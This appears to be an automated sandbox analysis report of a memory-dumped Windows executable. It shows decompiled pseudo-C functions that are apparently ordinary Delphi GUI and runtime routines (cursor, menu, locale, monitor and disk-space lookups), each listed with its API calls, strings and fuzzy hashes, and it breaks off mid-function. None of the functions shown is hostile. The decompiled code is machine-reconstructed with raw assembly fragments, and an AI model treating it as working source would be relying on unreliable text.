E0043887C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) { intOrPtr _v16; intOrPtr _t24; intOrPtr _t26; intOrPtr _t28; intOrPtr* _t32; intOrPtr _t35; intOrPtr _t37; struct HWND__* _t38; intOrPtr _t39; intOrPtr* _t41; intOrPtr _t45; intOrPtr _t49; intOrPtr* _t53; long _t58; intOrPtr _t59; intOrPtr _t60; intOrPtr* _t65; intOrPtr _t66; intOrPtr _t70; intOrPtr* _t77; void* _t79; intOrPtr* _t80; long long _t87; _t87 = __fp0; _t80 = _t79 + 0xfffffff8; _t70 = __ecx; _t45 = __edx; _t77 = __eax; *0x466514 = __eax; _t24 = *0x466514; // 0x0 *((intOrPtr*)(_t24 + 8)) = 0; GetCursorPos(0x466520); _t26 = *0x466514; // 0x0 _t58 = 0x466520->x; // 0x0 *(_t26 + 0x10) = _t58; _t59 = *0x466524; // 0x0 *((intOrPtr*)(_t26 + 0x14)) = _t59; *0x466528 = GetCursor(); _t28 = *0x466514; // 0x0 *0x46651c = E00437A5C(_t28); *0x46652c = _t70; _t60 = *0x43519c; // 0x4351e8 if(E00403AB4(_t77, _t60) == 0) { __eflags = _t45; if(__eflags == 0) { *0x466530 = 0; } else { *0x466530 = 1; } } else { _t65 = _t77; _t4 = _t65 + 0x4c; // 0x4c _t41 = _t4; _t49 = *_t41; if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) { __eflags = 0; *((intOrPtr*)(_t65 + 0x28)) = 0; *((intOrPtr*)(_t65 + 0x2c)) = 0; } else { *_t80 = *((intOrPtr*)(_t65 + 0x10)) - _t49; asm("fild dword [esp]"); _v16 = *((intOrPtr*)(_t41 + 8)) - *_t41; asm("fild dword [esp+0x4]"); asm("fdivp st1, st0"); *((long long*)(_t65 + 0x28)) = __fp0; asm("wait"); } _t66 = *((intOrPtr*)(_t41 + 4)); if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) { __eflags = 0; *((intOrPtr*)(_t77 + 0x30)) = 0; *((intOrPtr*)(_t77 + 0x34)) = 0; } else { _t53 = _t77; *_t80 = *((intOrPtr*)(_t53 + 0x14)) - _t66; asm("fild dword [esp]"); _v16 = *((intOrPtr*)(_t41 + 0xc)) - *((intOrPtr*)(_t41 + 4)); asm("fild dword [esp+0x4]"); asm("fdivp st1, st0"); *((long long*)(_t53 + 0x30)) = _t87; asm("wait"); } if(_t45 == 0) { *0x466530 = 0; } else { *0x466530 = 2; *((intOrPtr*)( *_t77 + 0x30))(); } } _t32 = *0x466514; // 0x0 *0x466534 = *((intOrPtr*)( *_t32 + 8))(); _t85 = *0x466534; if( *0x466534 != 0) { _t37 = *0x466524; // 0x0 _t38 = GetDesktopWindow(); _t39 = *0x466534; // 0x0 L00443F74(_t39, _t38, _t85, _t37); } _t35 = E004038F8(1); *0x46653c = _t35; if( *0x466530 != 0) { _t35 = E00438594(0x466520, 1); } return _t35; } 0x0043887c 0x0043887f 0x00438882 0x00438884 0x00438886 0x00438888 0x0043888e 0x00438895 0x0043889d 0x004388a2 0x004388a7 0x004388ad 0x004388b0 0x004388b6 0x004388be 0x004388c3 0x004388cd 0x004388d2 0x004388da 0x004388e7 0x00438979 0x0043897b 0x00438986 0x0043897d 0x0043897d 0x0043897d 0x004388ed 0x004388ed 0x004388ef 0x004388ef 0x004388f5 0x004388fb 0x0043891d 0x0043891f 0x00438922 0x004388fd 0x00438902 0x00438905 0x0043890d 0x00438911 0x00438915 0x00438917 0x0043891a 0x0043891a 0x00438928 0x0043892f 0x00438954 0x00438956 0x00438959 0x00438931 0x00438931 0x00438938 0x0043893b 0x00438944 0x00438948 0x0043894c 0x0043894e 0x00438951 0x00438951 0x0043895e 0x00438970 0x00438960 0x00438960 0x0043896b 0x0043896b 0x0043895e 0x0043898d 0x00438997 0x0043899c 0x004389a3 0x004389a5 0x004389ab 0x004389b8 0x004389bd 0x004389bd 0x004389c9 0x004389ce 0x004389da 0x004389e1 0x004389e1 0x004389eb

APIs

GetCursorPos.USER32(00466520), ref: 0043889D GetCursor.USER32(00466520), ref: 004388B9 Part of subcall function 00437A5C: SetCapture.USER32(00000000,?,004388CD,00466520), ref: 00437A6B GetDesktopWindow.USER32 ref: 004389AB

Strings

QC , xrefs: 004388DA

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow String ID: QC API String ID: 669539147-2823088291 Opcode ID: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09 Instruction ID: ec58099d30e1c5017fec0aa898c8ab184d5e574ebc14b3c512b5b419d34dbb6a Opcode Fuzzy Hash: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09 Instruction Fuzzy Hash: 74415EB16052009FC304DF2DF985625BBE1BF88304B16956EE48A9B369EB75D841CF8A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0040C574(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) { char _v8; struct _MEMORY_BASIC_INFORMATION _v36; char _v297; char _v304; intOrPtr _v308; char _v312; char _v316; char _v320; intOrPtr _v324; char _v328; void* _v332; char _v336; char _v340; char _v344; char _v348; intOrPtr _v352; char _v356; char _v360; char _v364; void* _v368; char _v372; intOrPtr _t52; intOrPtr _t60; intOrPtr _t82; intOrPtr _t86; intOrPtr _t89; intOrPtr _t101; void* _t108; intOrPtr _t110; void* _t113; _t108 = __edi; _v372 = 0; _v336 = 0; _v344 = 0; _v340 = 0; _v8 = 0; _push(_t113); _push(0x40c72f); _push( *[fs:eax]); *[fs:eax] = _t113 + 0xfffffe90; _t89 = *((intOrPtr*)(_a4 - 4)); if( *((intOrPtr*)(_t89 + 0x14)) != 0) { _t52 = *0x462dac; // 0x407654 E00406740(_t52, &_v8); } else { _t86 = *0x462f40; // 0x40764c E00406740(_t86, &_v8); } _t110 = *((intOrPtr*)(_t89 + 0x18)); VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c); if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) { _v368 = *(_t89 + 0xc); _v364 = 5; _v360 = _v8; _v356 = 0xb; _v352 = _t110; _v348 = 5; _t60 = *0x462db8; // 0x4075fc E00406740(_t60, &_v372); E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368); } else { _v332 = *(_t89 + 0xc); _v328 = 5; E004049AC( &_v340, 0x105, &_v297); E00408F20(_v340, &_v336); _v324 = _v336; _v320 = 0xb; _v316 = _v8; _v312 = 0xb; _v308 = _t110; _v304 = 5; _t82 = *0x462e34; // 0x407714 E00406740(_t82, &_v344); E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332); } _pop(_t101); *[fs:eax] = _t101; _push(E0040C736); E0040473C( &_v372); E00404760( &_v344, 3); return E0040473C( &_v8); } 0x0040c574 0x0040c581 0x0040c587 0x0040c58d 0x0040c593 0x0040c599 0x0040c59e 0x0040c59f 0x0040c5a4 0x0040c5a7 0x0040c5ad 0x0040c5b4 0x0040c5c8 0x0040c5cd 0x0040c5b6 0x0040c5b9 0x0040c5be 0x0040c5be 0x0040c5d2 0x0040c5df 0x0040c5eb 0x0040c6a7 0x0040c6ad 0x0040c6b7 0x0040c6bd 0x0040c6c4 0x0040c6ca 0x0040c6e0 0x0040c6e5 0x0040c6f7 0x0040c60e 0x0040c611 0x0040c617 0x0040c62f 0x0040c640 0x0040c64b 0x0040c651 0x0040c65b 0x0040c661 0x0040c668 0x0040c66e 0x0040c684 0x0040c689 0x0040c69b 0x0040c6a0 0x0040c700 0x0040c703 0x0040c706 0x0040c711 0x0040c721 0x0040c72e

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Tv@ , xrefs: 0040C5C8 Lv@ , xrefs: 0040C5B9

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@$Tv@ API String ID: 902310565-3490928387 Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1 Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0040BA08(void* __ebx, void* __edi, void* __esi) { int _v8; signed int _v12; char _v16; char _v20; char _v24; char _v28; void* _t53; void* _t54; intOrPtr _t80; void* _t83; void* _t84; void* _t86; void* _t87; intOrPtr _t90; _t89 = _t90; _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(_t90); _push(0x40bb1b); _push( *[fs:eax]); *[fs:eax] = _t90; _v8 = GetThreadLocale(); _t53 = 1; _t86 = 0x465830; _t83 = 0x465860; do { _t3 = _t53 + 0x44; // 0x45 E0040B9CC(_t3 - 1, _t53 - 1, &_v16, 0xb, _t89); E00404790(_t86, _v16); _t6 = _t53 + 0x38; // 0x39 E0040B9CC(_t6 - 1, _t53 - 1, &_v20, 0xb, _t89); E00404790(_t83, _v20); _t53 = _t53 + 1; _t83 = _t83 + 4; _t86 = _t86 + 4; } while (_t53 != 0xd); _t54 = 1; _t87 = 0x465890; _t84 = 0x4658ac; do { _t8 = _t54 + 5; // 0x6 asm("cdq"); _v12 = _t8 % 7; E0040B9CC(_v12 + 0x31, _t54 - 1, &_v24, 6, _t89); E00404790(_t87, _v24); E0040B9CC(_v12 + 0x2a, _t54 - 1, &_v28, 6, _t89); E00404790(_t84, _v28); _t54 = _t54 + 1; _t84 = _t84 + 4; _t87 = _t87 + 4; } while (_t54 != 8); _pop(_t80); *[fs:eax] = _t80; _push(E0040BB22); return E00404760( &_v28, 4); } 0x0040ba09 0x0040ba0d 0x0040ba0e 0x0040ba0f 0x0040ba10 0x0040ba11 0x0040ba12 0x0040ba18 0x0040ba19 0x0040ba1e 0x0040ba21 0x0040ba29 0x0040ba2c 0x0040ba31 0x0040ba36 0x0040ba3b 0x0040ba4a 0x0040ba4e 0x0040ba59 0x0040ba6d 0x0040ba71 0x0040ba7c 0x0040ba81 0x0040ba82 0x0040ba85 0x0040ba88 0x0040ba8d 0x0040ba92 0x0040ba97 0x0040ba9c 0x0040ba9c 0x0040baa4 0x0040baa7 0x0040babf 0x0040baca 0x0040bae4 0x0040baef 0x0040baf4 0x0040baf5 0x0040baf8 0x0040bafb 0x0040bb02 0x0040bb05 0x0040bb08 0x0040bb1a

APIs

GetThreadLocale.KERNEL32(00000000,0040BB1B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040BA24

Strings

,w@ , xrefs: 0040BA42 $x@ , xrefs: 0040BAD6 w@ , xrefs: 0040BAB1

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread String ID: $x@$,w@$w@ API String ID: 635194068-3772529897 Opcode ID: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0 Instruction ID: ff42a5d57a33c53001075c18811d422212253fa3653e9f98a0f8edc246bfd2b8 Opcode Fuzzy Hash: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0 Instruction Fuzzy Hash: E33178B1F005085BD704EA95D881BAF77A9DBC8314F65443BFA09E7381D73DAD0186AD

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%

E004577C4(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { int _v8; char _v9; char _v16; char _v20; intOrPtr _t39; long _t44; int _t59; void* _t70; intOrPtr _t74; intOrPtr* _t75; intOrPtr _t76; void* _t82; void* _t83; intOrPtr _t84; _t80 = __esi; _t79 = __edi; _t70 = __edx; _t82 = _t83; _t84 = _t83 + 0xfffffff0; _push(__ebx); _push(__esi); _push(__edi); _v16 = 0; _v20 = 0; _v8 = __eax; _push(_t82); _push(0x457911); _push( *[fs:eax]); *[fs:eax] = _t84; _t63 = E00457738(_v8); if( *((char*)(_v8 + 0x88)) != 0) { _t59 = _v8; _t86 = *((intOrPtr*)(_t59 + 0x48)); if( *((intOrPtr*)(_t59 + 0x48)) == 0) { L00457D90(_v8, 0, _t70); } } E00455250(_t63, &_v20); E00437730(_v20, 0, &_v16, _t86); _t39 = *0x466580; // 0x26df470 E004579C0(_t39, _v16, _t86); _v9 = 1; _push(_t82); _push(0x4578b8); _push( *[fs:eax]); *[fs:eax] = _t84; if( *((short*)(_v8 + 0x12a)) != 0) { _t63 = _v8; *((intOrPtr*)(_v8 + 0x128))(); } if(_v9 != 0) { _t24 = _v8 + 0xc0; // 0xbea6e800 _t63 = *_t24; if(_t63 > 0) { __eflags = *0x4665a0; if( *0x4665a0 == 0) { *0x4665a0 = SetTimer(0, 0, _t63, E0045775C); __eflags = *0x4665a0; if( *0x4665a0 == 0) { E004576D4(); } } } else { E004576D4(); } } _pop(_t74); *[fs:eax] = _t74; _t44 = GetCurrentThreadId(); _t75 = *0x462f38; // 0x463034 if(_t44 == *_t75 && E0042048C(0, _t63, _t79, _t80) != 0) { _v9 = 0; } if(_v9 != 0) { WaitMessage(); } _pop(_t76); *[fs:eax] = _t76; _push(E00457918); return E00404760( &_v20, 2); } 0x004577c4 0x004577c4 0x004577c4 0x004577c5 0x004577c7 0x004577ca 0x004577cb 0x004577cc 0x004577cf 0x004577d2 0x004577d5 0x004577da 0x004577db 0x004577e0 0x004577e3 0x004577ee 0x004577fa 0x004577fc 0x004577ff 0x00457803 0x00457808 0x00457808 0x00457803 0x00457812 0x0045781d 0x00457825 0x0045782a 0x0045782f 0x00457835 0x00457836 0x0045783b 0x0045783e 0x0045784c 0x00457851 0x0045785d 0x0045785d 0x00457867 0x0045786c 0x0045786c 0x00457874 0x00457880 0x00457887 0x00457898 0x0045789d 0x004578a4 0x004578a9 0x004578a9 0x004578a4 0x00457876 0x00457879 0x00457879 0x00457874 0x004578b0 0x004578b3 0x004578cd 0x004578d2 0x004578da 0x004578e7 0x004578e7 0x004578ef 0x004578f1 0x004578f1 0x004578f8 0x004578fb 0x004578fe 0x00457910

APIs

Part of subcall function 00457738: GetCursorPos.USER32 ref: 0045773F SetTimer.USER32 ref: 00457893 GetCurrentThreadId.KERNEL32 ref: 004578CD WaitMessage.USER32(00000000,00457911,?,?,?,00460C02), ref: 004578F1

Strings

40F , xrefs: 004578D2

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorMessageThreadTimerWait String ID: 40F API String ID: 3909455694-2631550472 Opcode ID: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364 Instruction ID: e89649fe14110faf48328d87229489a930fd8d9713066124e3e3ff92809c3fcb Opcode Fuzzy Hash: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364 Instruction Fuzzy Hash: 0E419330A08204AFDB11EBA4E886B9E77F5EF04315F6144BAEC0097393D7786E48CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E0043394C(intOrPtr* __eax) { struct tagMENUITEMINFOA _v128; intOrPtr _v132; int _t16; intOrPtr* _t29; struct HMENU__* _t36; MENUITEMINFOA* _t37; _t37 = &_v128; _t29 = __eax; _t16 = *0x462f3c; // 0x4658c8 if( *((char*)(_t16 + 0xd)) != 0 && *((intOrPtr*)(__eax + 0x38)) != 0) { _t36 = *((intOrPtr*)( *__eax + 0x34))(); _t37->cbSize = 0x2c; _v132 = 0x10; _v128.hbmpUnchecked = &(_v128.cch); _v128.dwItemData = 0x50; _t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37); if(_t16 != 0) { _t16 = E00433CE0(_t29); asm("sbb edx, edx"); if(_t16 != (_v128.cbSize & 0x00006000) + 1) { _v128.cbSize = ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) + ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff; _v132 = 0x10; _t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37); if(_t16 != 0) { return DrawMenuBar( *(_t29 + 0x38)); } } } } return _t16; } 0x0043394e 0x00433951 0x00433953 0x0043395c 0x00433973 0x00433975 0x0043397c 0x00433988 0x0043398c 0x0043399a 0x004339a1 0x004339a5 0x004339b7 0x004339bc 0x004339da 0x004339de 0x004339ec 0x004339f3 0x00000000 0x004339f9 0x004339f3 0x004339bc 0x004339a1 0x00433a06

APIs

GetMenuItemInfoA.USER32 ref: 0043399A SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004339EC DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004339F9

Strings

P , xrefs: 0043398C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw String ID: P API String ID: 3227129158-3110715001 Opcode ID: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9 Instruction ID: 1a0cb4ff114c7cd32e92c9fa77bceba14735dfb38598f85aa0acc494823d54c1 Opcode Fuzzy Hash: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9 Instruction Fuzzy Hash: EF11C470605210AFD310DF29CC85B4B76D4AF88366F149669F094D73E9D77DC984C78A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E00422F78(intOrPtr _a4, intOrPtr _a8, signed int _a12) { void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t15; void* _t16; intOrPtr _t18; signed int _t19; void* _t20; intOrPtr _t21; _t19 = _a12; if( *0x46633b != 0) { _t16 = 0; if((_t19 & 0x00000003) != 0) { L7: _t16 = 0x12340042; } else { _t21 = _a4; if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) { goto L7; } } } else { _t18 = *0x46631c; // 0x422f78 *0x46631c = E00422CE4(3, _t15, _t18, _t19, _t20); _t16 = *0x46631c(_a4, _a8, _t19); } return _t16; } 0x00422f7e 0x00422f88 0x00422fb2 0x00422fbb 0x00422fe3 0x00422fe3 0x00422fbd 0x00422fbd 0x00422fc2 0x00000000 0x00000000 0x00422fc2 0x00422f8a 0x00422f8f 0x00422f9c 0x00422fae 0x00422fae 0x00422fee

APIs

GetSystemMetrics.USER32 ref: 00422FC6 GetSystemMetrics.USER32 ref: 00422FD8 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

x/B , xrefs: 00422F8F, 00422F9C, 00422FA8 MonitorFromPoint , xrefs: 00422F8A

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: MonitorFromPoint$x/B API String ID: 1792783759-3362865607 Opcode ID: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764 Instruction ID: 8c996490f865ef833d6f29e33133d28ea07156a354397cb3f82660790c2b9ebf Opcode Fuzzy Hash: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764 Instruction Fuzzy Hash: 5D01DF313001247BDB009F05EE44B5ABB60E710314FC28037FC049A3A0D3F98C81EBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E00422E50(intOrPtr* _a4, signed int _a8) { void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr* _t14; intOrPtr _t16; signed int _t17; void* _t18; void* _t19; _t17 = _a8; _t14 = _a4; if( *0x46633a != 0) { _t19 = 0; if((_t17 & 0x00000003) != 0 || *((intOrPtr*)(_t14 + 8)) > 0 && *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) > *_t14 && GetSystemMetrics(1) > *((intOrPtr*)(_t14 + 4))) { _t19 = 0x12340042; } } else { _t16 = *0x466318; // 0x422e50 *0x466318 = E00422CE4(2, _t14, _t16, _t17, _t18); _t19 = *0x466318(_t14, _t17); } return _t19; } 0x00422e56 0x00422e59 0x00422e63 0x00422e88 0x00422e91 0x00422eb8 0x00422eb8 0x00422e65 0x00422e6a 0x00422e77 0x00422e84 0x00422e84 0x00422ec3

APIs

GetSystemMetrics.USER32 ref: 00422EA1 GetSystemMetrics.USER32 ref: 00422EAD Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

P.B , xrefs: 00422E6A, 00422E77, 00422E7E MonitorFromRect , xrefs: 00422E65

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: MonitorFromRect$P.B API String ID: 1792783759-2213800761 Opcode ID: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78 Instruction ID: 344e9d6dab49e3fdbc3704bf19803c74fdffa6d0553f2af2d0679323b2ac8f6f Opcode Fuzzy Hash: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78 Instruction Fuzzy Hash: 37018B32700224BBDB208B04EA85B1AB758F740724F868462FC04CA342C3F89C80DBFA

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040D85C() { _Unknown_base(*)()* _t1; struct HINSTANCE__* _t3; _t1 = GetModuleHandleA("kernel32.dll"); _t3 = _t1; if(_t3 != 0) { _t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA"); *0x46182c = _t1; } if( *0x46182c == 0) { *0x46182c = E00408F94; return E00408F94; } return _t1; } 0x0040d862 0x0040d867 0x0040d86b 0x0040d873 0x0040d878 0x0040d878 0x0040d884 0x0040d88b 0x00000000 0x0040d88b 0x0040d891

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0046010B,00000000,0046011E), ref: 0040D862 GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040D873

Strings

GetDiskFreeSpaceExA , xrefs: 0040D86D kernel32.dll , xrefs: 0040D85D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc String ID: GetDiskFreeSpaceExA$kernel32.dll API String ID: 1646373207-3712701948 Opcode ID: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1 Instruction ID: f92f8e55d4f3d77ad231ec8b499964c1603e405444d36c9258ecd07ec0a69fbb Opcode Fuzzy Hash: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1 Instruction Fuzzy Hash: 30D09EE6A003519EEB11BBF65881A2636D49B14308B18843BE151B62E2E7FDC818CF9D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E0043D9E0(signed int __eax, int* __ecx, void* __edx, char _a4, intOrPtr* _a8, void* _a12, signed int _a16) { signed int _v8; signed int _v12; signed int _v16; signed int _v20; signed int _v24; char _v40; signed int _t170; signed int _t181; void* _t194; void* _t198; int _t218; int _t223; int _t228; signed int _t229; void* _t237; signed int _t238; int* _t244; signed int _t274; signed int _t276; signed int _t278; void* _t284; intOrPtr* _t290; void* _t292; void* _t302; void* _t304; _t170 = __eax; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t244 = __ecx; _t292 = __edx; _v8 = __eax; _t290 = _a8; if(_a16 == 0) { L2: if( *(_t292 + 0x175) == 0 || *(_t292 + 0x179) == 0) { L30: if(_a16 == 0) { L55: return _t170; } L31: _v20 = *((intOrPtr*)(_t290 + 8)) - *_t290; if(_v20 < 0) { L34: _v20 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); L35: _v24 = *((intOrPtr*)(_t290 + 0xc)) - *((intOrPtr*)(_t290 + 4)); if(_v24 < 0) { L38: _v24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); L39: _v12 = *_t290; _v16 = *((intOrPtr*)(_t290 + 4)); _t181 = _a16 & 0x000000ff; if(_t181 > 6) { L46: E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))() != _v20) { L48: _t170 = _a16 & 0x000000ff; if(_t170 > 5) { goto L55; } switch( *((intOrPtr*)(_t170 * 4 + &M0043DD0B))) { case 0: goto L55; case 1: _t189 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); *((intOrPtr*)(_t290 + 4)) = *((intOrPtr*)(_t290 + 4)) - _v24 - _t189; return _t189; case 2: __edx = 3; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v24 = _v24 - __eax; *(__edi + 0xc) = *(__edi + 0xc) + _v24 - __eax; return __eax; case 3: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *__edi = *__edi - _v20 - __eax; return __eax; case 4: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *(__edi + 8) = *(__edi + 8) + _v20 - __eax; return __eax; case 5: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *(__edi + 8) = *(__edi + 8) + _v20 - __eax; __edx = 3; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v24 = _v24 - __eax; _t168 = __edi + 0xc; *_t168 = *(__edi + 0xc) + _v24 - __eax; __eflags = *_t168; return __eax; } } _t170 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); if(_t170 == _v24) { goto L55; } goto L48; } switch( *((intOrPtr*)(_t181 * 4 + &M0043DC43))) { case 0: goto L46; case 1: *((intOrPtr*)(_t290 + 4)) = *((intOrPtr*)(_t290 + 4)) + _v24; goto L46; case 2: __eax = _v24; *(__edi + 0xc) = *(__edi + 0xc) - _v24; __eax = *(__edi + 0xc); _v16 = __eax; goto L46; case 3: __eax = _v20; *__edi = *__edi + __eax; goto L46; case 4: __eax = _v20; 